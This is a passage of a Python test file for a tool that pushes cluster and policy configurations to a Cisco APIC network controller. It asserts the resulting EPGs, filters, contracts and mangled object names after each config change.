"descr": "sample description",
"whitelist": [
{
"port": [
81,
81
],
"proto": 6,
"action": "ALLOW"
}
]
}
]
}
"""
load_config = LoadConfig()
tenant_name = 'configpush-test1***#####:::{{{}}}}'
app_name = 'app-test***#####:::{{{}}}}'
l3ext_name = 'l3external-test***#####:::{{{}}}}'
load_config.load_configFile(
config_file,
is_file=False,
tenant_name=tenant_name,
app_name=app_name,
l3ext_name=l3ext_name)
time.sleep(5)
tenants = Tenant.get(load_config.session)
for tenant in tenants:
if tenant.name == tenant_name:
tenant.mark_as_deleted()
resp = tenant.push_to_apic(load_config.session)
if not resp.ok:
print "tenant deletion failed"
time.sleep(5)
load_config = LoadConfig()
load_config.load_configFile(
config_file,
is_file=False,
tenant_name=tenant_name,
app_name=app_name,
l3ext_name=l3ext_name)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == "configpush-test1__________________":
self.assertEqual("configpush-test1__________________", tenant.name, "tenant name mangled successfully")
app_profiles = tenant.get_children(AppProfile)
self.assertEqual(1, len(app_profiles), "num of app_profiles didnot match")
for app_profile in app_profiles:
self.assertEqual("app-test__________________", app_profile.name, "app_profile name mangled successfully")
epgs = app_profile.get_children(EPG)
self.assertEqual(1, len(epgs), "num of epgs didnot match")
for epg in epgs:
self.assertEqual(epg.name, "Configpushtest2____..____-1", "epg name mangled successfully")
filters = tenant.get_children(Filter)
self.assertEqual(1, len(filters), "num of filters didnot match")
outsideL3s = tenant.get_children(OutsideL3)
self.assertEqual(1, len(outsideL3s), "num of outsideL3s didnot match")
for outsideL3 in outsideL3s:
self.assertEqual("l3external-test__________________", outsideL3.name, "outsideL3 name mangled successfully")
outsideEpgs = outsideL3.get_children(OutsideEPG)
self.assertEqual(1, len(outsideEpgs), "num 0f outsideEpgs didnot match")
for outsideEpg in outsideEpgs:
self.assertEqual(outsideEpg.name, "Configpushtest_____..____-0", "outsideEpg name mangled successfully")
outsideNetworks = outsideEpg.get_children(OutsideNetwork)
self.assertEqual(1, len(outsideNetworks), "num 0f outsideEpgs didnot match")
for outsideNetwork in outsideNetworks:
self.assertEqual(outsideNetwork.name, "240.0.0.0_24", "outsideNetwork name mangled successfully")
contracts = tenant.get_children(Contract)
self.assertEqual(1, len(contracts), "num of contracts didnot match")
for contract in contracts:
self.assertEqual(contract.name, "Configpushtest_____..____-0::Configpushtest2____..____-1", "contract name mangled successfully")
contract_subjects = contract.get_children(ContractSubject)
self.assertEqual(1, len(contract_subjects), "num 0f contract_subjects didnot match")
for contract_subject in contract_subjects:
self.assertEqual(contract_subject.name, "Configpushtest_____..____-0::Configpushtest2____..____-1_Subject", "contract_subject name mangled successfully")
def test_update_configpush_for_clusters(self):
    """
    after the initial push
    adding a new cluster with name Configpushtest*-(3) without touching any others
    the epgs count should be only 2 now
    when we push this config to apic, the EPGs should stay as is and the new EPGS should not be added, count should match to two.
    """
    # Config: the two original clusters plus a new, unreferenced cluster
    # Configpushtest*-(3); the single policy still links cluster 1 -> 2
    # only, so no EPG should be created for the third cluster.
    config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
},
{
"name": "Configpushtest*-(3)",
"id": "56c3d31561707035c0c13b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
0,
0
],
"proto": 6,
"action": "ALLOW"
}
]
}
]
}
"""
    load_config = LoadConfig()
    load_config.load_configFile(config_file, is_file=False)
    # Give APIC time to process the pushed configuration.
    time.sleep(5)
    tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
    for tenant in tenants:
        if tenant.name == 'configpush-test':
            existing_filters = tenant.get_children(Filter)
            self.assertEquals(len(existing_filters), 2,
                              "filter count did not match for the pushed config and existing config")
            app_profiles = tenant.get_children(AppProfile)
            # NOTE(review): assumes at least one AppProfile exists -- an
            # empty list raises IndexError instead of a clean test failure.
            app = app_profiles[0]
            existing_epgs = app.get_children(EPG)
            self.assertEquals(len(existing_epgs), 2,
                              "epgs count did not match for the pushed config and existing config")
            for existing_epg in existing_epgs:
                self.assertEqual(existing_epg.is_attributed_based, False,
                                 "attribute based is true for EPG " + existing_epg.name)
                if existing_epg.name == 'Configpushtest_-_1_-0':
                    # Policy source side: consumes the contract only.
                    self.assertEqual(len(existing_epg.get_all_consumed()), 1,
                                     "consumed EPG did not match for EPG " + existing_epg.name)
                    self.assertEqual(len(existing_epg.get_all_provided()), 0,
                                     "provided EPG did not match for EPG " + existing_epg.name)
                elif existing_epg.name == 'Configpushtest_-_2_-1':
                    # Policy destination side: provides the contract only.
                    self.assertEqual(len(existing_epg.get_all_consumed()), 0,
                                     "consumed EPG did not match for EPG " + existing_epg.name)
                    self.assertEqual(len(existing_epg.get_all_provided()), 1,
                                     "provided EPG did not match for EPG " + existing_epg.name)
                # The unreferenced third cluster must not have produced an EPG.
                self.assertNotEquals(existing_epg.name, "Configpushtest_-_3_-1", "the unwanted epg exists")
            existing_contracts = tenant.get_children(Contract)
            self.assertEquals(len(existing_contracts), 1,
                              "contracts count did not match for the pushed config and existing config")
            for existing_contract in existing_contracts:
                self.assertEqual(existing_contract.name, "Configpushtest_-_1_-0::Configpushtest_-_2_-1",
                                 "contract name did not match with the config")
                for child_contract_subject in existing_contract.get_children(ContractSubject):
                    self.assertEqual(len(child_contract_subject.get_filters()), 2,
                                     "num of filters in contract_subject did not match " + child_contract_subject.name)
                    self.assertEqual(child_contract_subject.name,
                                     "Configpushtest_-_1_-0::Configpushtest_-_2_-1_Subject",
                                     "contract_subject name did not match with the config")
            # The tool is not expected to create bridge domains or contexts.
            existing_bds = tenant.get_children(BridgeDomain)
            self.assertEquals(len(existing_bds), 0,
                              "bridgeDomains count did not match for the pushed config and existing config")
            existing_contexts = tenant.get_children(Context)
            self.assertEquals(len(existing_contexts), 0,
                              "existing_contexts count did not match for the pushed config and existing config")
def test_update_configpush_for_clusters_deletion(self):
    """
    deleting the cluster with name Configpushtest*-(3) without touching any others
    the epgs count should be only 2 now
    when we push this config to apic, the EPGs should stay as is and no new EPGS should be added, count should match to two.
    """
    # Config: back to only the two original clusters (cluster 3 removed);
    # the policy linking cluster 1 -> 2 is unchanged.
    config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
0,
0
],
"proto": 6,
"action": "ALLOW"
}
]
}
]
}
"""
    load_config = LoadConfig()
    load_config.load_configFile(config_file, is_file=False)
    # Give APIC time to process the pushed configuration.
    time.sleep(5)
    tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
    for tenant in tenants:
        if tenant.name == 'configpush-test':
            existing_filters = tenant.get_children(Filter)
            self.assertEquals(len(existing_filters), 2,
                              "filter count did not match for the pushed config and existing config")
            app_profiles = tenant.get_children(AppProfile)
            # NOTE(review): assumes at least one AppProfile exists -- an
            # empty list raises IndexError instead of a clean test failure.
            app = app_profiles[0]
            existing_epgs = app.get_children(EPG)
            self.assertEquals(len(existing_epgs), 2,
                              "epgs count did not match for the pushed config and existing config")
            for existing_epg in existing_epgs:
                self.assertEqual(existing_epg.is_attributed_based, False,
                                 "attribute based is true for EPG " + existing_epg.name)
                if existing_epg.name == 'Configpushtest_-_1_-0':
                    # Policy source side: consumes the contract only.
                    self.assertEqual(len(existing_epg.get_all_consumed()), 1,
                                     "consumed EPG did not match for EPG " + existing_epg.name)
                    self.assertEqual(len(existing_epg.get_all_provided()), 0,
                                     "provided EPG did not match for EPG " + existing_epg.name)
                elif existing_epg.name == 'Configpushtest_-_2_-1':
                    # Policy destination side: provides the contract only.
                    self.assertEqual(len(existing_epg.get_all_consumed()), 0,
                                     "consumed EPG did not match for EPG " + existing_epg.name)
                    self.assertEqual(len(existing_epg.get_all_provided()), 1,
                                     "provided EPG did not match for EPG " + existing_epg.name)
                # The deleted cluster's EPG must no longer be present.
                self.assertNotEquals(existing_epg.name, "Configpushtest_-_3_-1", "the unwanted epg exists")
            existing_contracts = tenant.get_children(Contract)
            self.assertEquals(len(existing_contracts), 1,
                              "contracts count did not match for the pushed config and existing config")
            for existing_contract in existing_contracts:
                self.assertEqual(existing_contract.name, "Configpushtest_-_1_-0::Configpushtest_-_2_-1",
                                 "contract name did not match with the config")
                for child_contract_subject in existing_contract.get_children(ContractSubject):
                    self.assertEqual(len(child_contract_subject.get_filters()), 2,
                                     "num of filters in contract_subject did not match " + child_contract_subject.name)
                    self.assertEqual(child_contract_subject.name,
                                     "Configpushtest_-_1_-0::Configpushtest_-_2_-1_Subject",
                                     "contract_subject name did not match with the config")
            # The tool is not expected to create bridge domains or contexts.
            existing_bds = tenant.get_children(BridgeDomain)
            self.assertEquals(len(existing_bds), 0,
                              "bridgeDomains count did not match for the pushed config and existing config")
            existing_contexts = tenant.get_children(Context)
            self.assertEquals(len(existing_contexts), 0,
                              "existing_contexts count did not match for the pushed config and existing config")
def test_update_configpush_for_filter_in_policies(self):
    """
    deleting a filter 6.0.0 and adding a filter 17.0.0
    when we push this config to apic, filter 6.0.0 should be deleted and filter 17.0.0 should be added in Filters
    Also this change should be reflected in Contracts. the relation in ContractSubject should point to 17.0.0 instead of 6.0.0
    """
    # Config: same two clusters; the policy whitelist now carries
    # proto 1 (ICMP) and proto 17 (UDP port 1) -- proto 6 (TCP) removed.
    config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
1,
1
],
"proto": 17,
"action": "ALLOW"
}
]
}
]
}
"""
    load_config = LoadConfig()
    load_config.load_configFile(config_file, is_file=False)
    # Give APIC time to process the pushed configuration.
    time.sleep(5)
    tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
    for tenant in tenants:
        if tenant.name == 'configpush-test':
            existing_filters = tenant.get_children(Filter)
            self.assertEquals(len(existing_filters), 2,
                              "filter count did not match for the pushed config and existing config")
            # Filter names follow the proto.fromPort.toPort convention.
            for existing_filter in existing_filters:
                self.assertTrue(existing_filter.name in ['1.0.0_Filter', '17.1.1_Filter'])
                self.assertTrue(existing_filter.name != '6.0.0_Filter')
            app_profiles = tenant.get_children(AppProfile)
            # NOTE(review): assumes at least one AppProfile exists -- an
            # empty list raises IndexError instead of a clean test failure.
            app = app_profiles[0]
            existing_epgs = app.get_children(EPG)
            self.assertEquals(len(existing_epgs), 2,
                              "epgs count did not match for the pushed config and existing config")
            for existing_epg in existing_epgs:
                self.assertEqual(existing_epg.is_attributed_based, False,
                                 "attribute based is true for EPG " + existing_epg.name)
                if existing_epg.name == 'Configpushtest_-_1_-0':
                    # Policy source side: consumes the contract only.
                    self.assertEqual(len(existing_epg.get_all_consumed()), 1,
                                     "consumed EPG did not match for EPG " + existing_epg.name)
                    self.assertEqual(len(existing_epg.get_all_provided()), 0,
                                     "provided EPG did not match for EPG " + existing_epg.name)
                elif existing_epg.name == 'Configpushtest_-_2_-1':
                    # Policy destination side: provides the contract only.
                    self.assertEqual(len(existing_epg.get_all_consumed()), 0,
                                     "consumed EPG did not match for EPG " + existing_epg.name)
                    self.assertEqual(len(existing_epg.get_all_provided()), 1,
                                     "provided EPG did not match for EPG " + existing_epg.name)
            existing_contracts = tenant.get_children(Contract)
            self.assertEquals(len(existing_contracts), 1,
                              "contracts count did not match for the pushed config and existing config")
            # The contract subject relations must follow the filter change.
            for existing_contract in existing_contracts:
                for child_contract_subject in existing_contract.get_children(ContractSubject):
                    self.assertEqual(len(child_contract_subject.get_filters()), 2,
                                     "num of filters in contract_subject did not match " + child_contract_subject.name)
                    for contract_subject_filter in child_contract_subject.get_filters():
                        self.assertTrue(contract_subject_filter.name in ['1.0.0_Filter', '17.1.1_Filter'])
                        self.assertTrue(contract_subject_filter.name != '6.0.0_Filter')
            # The tool is not expected to create bridge domains or contexts.
            existing_bds = tenant.get_children(BridgeDomain)
            self.assertEquals(len(existing_bds), 0,
                              "bridgeDomains count did not match for the pushed config and existing config")
            existing_contexts = tenant.get_children(Context)
            self.assertEquals(len(existing_contexts), 0,
                              "existing_contexts count did not match for the pushed config and existing config")
def test_update_configpush_for_filter_addition(self):
    """
    adding a filter 18.0.0, 19.1.1
    when we push this config to apic, filters 18.0.0 and 19.1.1 should be added in Filters and the count should be 4
    """
    # Config: same two clusters; the whitelist grows to four entries
    # (protos 1, 17, 18, 19), so two new filters should be created.
    config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
1,
1
],
"proto": 17,
"action": "ALLOW"
},
{
"port": [
0,
0
],
"proto": 18,
"action": "ALLOW"
},
{
"port": [
1,
1
],
"proto": 19,
"action": "ALLOW"
}
]
}
]
}
"""
    load_config = LoadConfig()
    load_config.load_configFile(config_file, is_file=False)
    # Give APIC time to process the pushed configuration.
    time.sleep(5)
    tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
    for tenant in tenants:
        if tenant.name == 'configpush-test':
            existing_filters = tenant.get_children(Filter)
            self.assertEquals(len(existing_filters), 4,
                              "filter count did not match for the pushed config and existing config")
            # Filter names follow the proto.fromPort.toPort convention.
            for existing_filter in existing_filters:
                self.assertTrue(
                    existing_filter.name in [
                        '1.0.0_Filter',
                        '17.1.1_Filter',
                        '18.0.0_Filter',
                        '19.1.1_Filter'])
                self.assertTrue(existing_filter.name != '6.0.0_Filter')
            app_profiles = tenant.get_children(AppProfile)
            # NOTE(review): assumes at least one AppProfile exists -- an
            # empty list raises IndexError instead of a clean test failure.
            app = app_profiles[0]
            existing_epgs = app.get_children(EPG)
            self.assertEquals(len(existing_epgs), 2,
                              "epgs count did not match for the pushed config and existing config")
            for existing_epg in existing_epgs:
                self.assertEqual(existing_epg.is_attributed_based, False,
                                 "attribute based is true for EPG " + existing_epg.name)
                if existing_epg.name == 'Configpushtest_-_1_-0':
                    # Policy source side: consumes the contract only.
                    self.assertEqual(len(existing_epg.get_all_consumed()), 1,
                                     "consumed EPG did not match for EPG " + existing_epg.name)
                    self.assertEqual(len(existing_epg.get_all_provided()), 0,
                                     "provided EPG did not match for EPG " + existing_epg.name)
                elif existing_epg.name == 'Configpushtest_-_2_-1':
                    # Policy destination side: provides the contract only.
                    self.assertEqual(len(existing_epg.get_all_consumed()), 0,
                                     "consumed EPG did not match for EPG " + existing_epg.name)
                    self.assertEqual(len(existing_epg.get_all_provided()), 1,
                                     "provided EPG did not match for EPG " + existing_epg.name)
            existing_contracts = tenant.get_children(Contract)
            self.assertEquals(len(existing_contracts), 1,
                              "contracts count did not match for the pushed config and existing config")
            # The contract subject must reference all four new filters.
            for existing_contract in existing_contracts:
                for child_contract_subject in existing_contract.get_children(ContractSubject):
                    self.assertEqual(len(child_contract_subject.get_filters()), 4,
                                     "num of filters in contract_subject did not match " + child_contract_subject.name)
                    for contract_subject_filter in child_contract_subject.get_filters():
                        self.assertTrue(
                            contract_subject_filter.name in [
                                '1.0.0_Filter',
                                '17.1.1_Filter',
                                '18.0.0_Filter',
                                '19.1.1_Filter'])
                        self.assertTrue(contract_subject_filter.name != '6.0.0_Filter')
            # The tool is not expected to create bridge domains or contexts.
            existing_bds = tenant.get_children(BridgeDomain)
            self.assertEquals(len(existing_bds), 0,
                              "bridgeDomains count did not match for the pushed config and existing config")
            existing_contexts = tenant.get_children(Context)
            self.assertEquals(len(existing_contexts), 0,
                              "existing_contexts count did not match for the pushed config and existing config")
def test_update_configpush_for_policies(self):
    """
    changing the source and destination of the policy. so the contract should be updated with respect to this
    """
    # Config: same two clusters; the policy direction is reversed
    # (src is now cluster 2, dst is cluster 1), so the provided/consumed
    # roles of the two EPGs and the contract name should swap.
    config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
}
],
"policies": [
{
"src": "56c3d31561707035c0c12b00",
"dst": "56c55b8761707062b2d11b00",
"src_name": "Configpushtest-policy*-(2)",
"dst_name": "Configpushtest-policy*-(1)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
0,
0
],
"proto": 6,
"action": "ALLOW"
}
]
}
]
}
"""
    load_config = LoadConfig()
    load_config.load_configFile(config_file, is_file=False)
    # Give APIC time to process the pushed configuration.
    time.sleep(5)
    tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
    for tenant in tenants:
        if tenant.name == 'configpush-test':
            existing_filters = tenant.get_children(Filter)
            self.assertEquals(len(existing_filters), 2,
                              "filter count did not match for the pushed config and existing config")
            app_profiles = tenant.get_children(AppProfile)
            # NOTE(review): assumes at least one AppProfile exists -- an
            # empty list raises IndexError instead of a clean test failure.
            app = app_profiles[0]
            existing_epgs = app.get_children(EPG)
            self.assertEquals(len(existing_epgs), 2,
                              "epgs count did not match for the pushed config and existing config")
            for existing_epg in existing_epgs:
                self.assertEqual(existing_epg.is_attributed_based, False,
                                 "attribute based is true for EPG " + existing_epg.name)
                if existing_epg.name == 'Configpushtest_-_1_-0':
                    # Now the destination side: provides the contract only.
                    self.assertEqual(len(existing_epg.get_all_consumed()), 0,
                                     "consumed EPG did not match for EPG " + existing_epg.name)
                    self.assertEqual(len(existing_epg.get_all_provided()), 1,
                                     "provided EPG did not match for EPG " + existing_epg.name)
                elif existing_epg.name == 'Configpushtest_-_2_-1':
                    # Now the source side: consumes the contract only.
                    self.assertEqual(len(existing_epg.get_all_consumed()), 1,
                                     "consumed EPG did not match for EPG " + existing_epg.name)
                    self.assertEqual(len(existing_epg.get_all_provided()), 0,
                                     "provided EPG did not match for EPG " + existing_epg.name)
            existing_contracts = tenant.get_children(Contract)
            self.assertEquals(len(existing_contracts), 1,
                              "contracts count did not match for the pushed config and existing config")
            # Contract and subject names are src::dst, so they are reversed too.
            for existing_contract in existing_contracts:
                self.assertEqual(existing_contract.name, "Configpushtest_-_2_-1::Configpushtest_-_1_-0",
                                 "contract name did not match with the config")
                for child_contract_subject in existing_contract.get_children(ContractSubject):
                    self.assertEqual(len(child_contract_subject.get_filters()), 2,
                                     "num of filters in contract_subject did not match " + child_contract_subject.name)
                    self.assertEqual(child_contract_subject.name,
                                     "Configpushtest_-_2_-1::Configpushtest_-_1_-0_Subject",
                                     "contract_subject name did not match with the config")
            # The tool is not expected to create bridge domains or contexts.
            existing_bds = tenant.get_children(BridgeDomain)
            self.assertEquals(len(existing_bds), 0,
                              "bridgeDomains count did not match for the pushed config and existing config")
            existing_contexts = tenant.get_children(Context)
            self.assertEquals(len(existing_contexts), 0,
                              "existing_contexts count did not match for the pushed config and existing config")
def test_update_configpush_for_policies_addition(self):
    """
    adding a new policy.
    now the contracts should be 2 without changing the filters and epgs
    the epgs count should be only 2 now
    when we push this config to apic, the EPGs should stay as is and no new EPGS should be added, count should match to two.
    """
    # Config: same two clusters; a second policy in the reverse direction
    # (cluster 2 -> 1, protos 17/18) is added, so each EPG now both
    # consumes one contract and provides the other.
    config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
0,
0
],
"proto": 6,
"action": "ALLOW"
}
]
},
{
"src": "56c3d31561707035c0c12b00",
"dst": "56c55b8761707062b2d11b00",
"src_name": "Configpushtest-policy*-(2)",
"dst_name": "Configpushtest-policy*-(1)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 17,
"action": "ALLOW"
},
{
"port": [
0,
0
],
"proto": 18,
"action": "ALLOW"
}
]
}
]
}
"""
    load_config = LoadConfig()
    load_config.load_configFile(config_file, is_file=False)
    # Give APIC time to process the pushed configuration.
    time.sleep(5)
    tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
    for tenant in tenants:
        if tenant.name == 'configpush-test':
            # Two filters per policy: 1/6 for the first, 17/18 for the second.
            existing_filters = tenant.get_children(Filter)
            self.assertEquals(len(existing_filters), 4,
                              "filter count did not match for the pushed config and existing config")
            app_profiles = tenant.get_children(AppProfile)
            # NOTE(review): assumes at least one AppProfile exists -- an
            # empty list raises IndexError instead of a clean test failure.
            app = app_profiles[0]
            existing_epgs = app.get_children(EPG)
            self.assertEquals(len(existing_epgs), 2,
                              "epgs count did not match for the pushed config and existing config")
            for existing_epg in existing_epgs:
                self.assertEqual(existing_epg.is_attributed_based, False,
                                 "attribute based is true for EPG " + existing_epg.name)
                # With policies in both directions, each EPG consumes one
                # contract and provides the other.
                if existing_epg.name == 'Configpushtest_-_1_-0':
                    self.assertEqual(len(existing_epg.get_all_consumed()), 1,
                                     "consumed EPG did not match for EPG " + existing_epg.name)
                    self.assertEqual(len(existing_epg.get_all_provided()), 1,
                                     "provided EPG did not match for EPG " + existing_epg.name)
                elif existing_epg.name == 'Configpushtest_-_2_-1':
                    self.assertEqual(len(existing_epg.get_all_consumed()), 1,
                                     "consumed EPG did not match for EPG " + existing_epg.name)
                    self.assertEqual(len(existing_epg.get_all_provided()), 1,
                                     "provided EPG did not match for EPG " + existing_epg.name)
            existing_contracts = tenant.get_children(Contract)
            self.assertEquals(len(existing_contracts), 2,
                              "contracts count did not match for the pushed config and existing config")
            # One contract (and subject) per policy direction.
            for existing_contract in existing_contracts:
                if existing_contract.name == "Configpushtest_-_1_-0::Configpushtest_-_2_-1":
                    self.assertEqual(existing_contract.name, "Configpushtest_-_1_-0::Configpushtest_-_2_-1",
                                     "contract name did not match with the config")
                    for child_contract_subject in existing_contract.get_children(ContractSubject):
                        self.assertEqual(len(child_contract_subject.get_filters()), 2,
                                         "num of filters in contract_subject did not match " + child_contract_subject.name)
                        self.assertEqual(child_contract_subject.name,
                                         "Configpushtest_-_1_-0::Configpushtest_-_2_-1_Subject",
                                         "contract_subject name did not match with the config")
                elif existing_contract.name == "Configpushtest_-_2_-1::Configpushtest_-_1_-0":
                    self.assertEqual(existing_contract.name, "Configpushtest_-_2_-1::Configpushtest_-_1_-0",
                                     "contract name did not match with the config")
                    for child_contract_subject in existing_contract.get_children(ContractSubject):
                        self.assertEqual(len(child_contract_subject.get_filters()), 2,
                                         "num of filters in contract_subject did not match " + child_contract_subject.name)
                        self.assertEqual(child_contract_subject.name,
                                         "Configpushtest_-_2_-1::Configpushtest_-_1_-0_Subject",
                                         "contract_subject name did not match with the config")
            # The tool is not expected to create bridge domains or contexts.
            existing_bds = tenant.get_children(BridgeDomain)
            self.assertEquals(len(existing_bds), 0,
                              "bridgeDomains count did not match for the pushed config and existing config")
            existing_contexts = tenant.get_children(Context)
            self.assertEquals(len(existing_contexts), 0,
                              "existing_contexts count did not match for the pushed config and existing config")
def test_update_configpush_l3out_external_initial(self):
    """
    initial test to configpush with l3out epgs
    firstly delete the existing tenant and push the config for the first time.
    config has external true for 1 policy and external false for the other
    after pushing the config there should be 1 epg in appProfile and 1 in External routed networks
    """
    # Config: cluster 2 is marked "external": true, so it should land as
    # an OutsideEPG under the L3Out instead of an EPG in the app profile.
    config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"external": true,
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
}
],
"policies": [
{
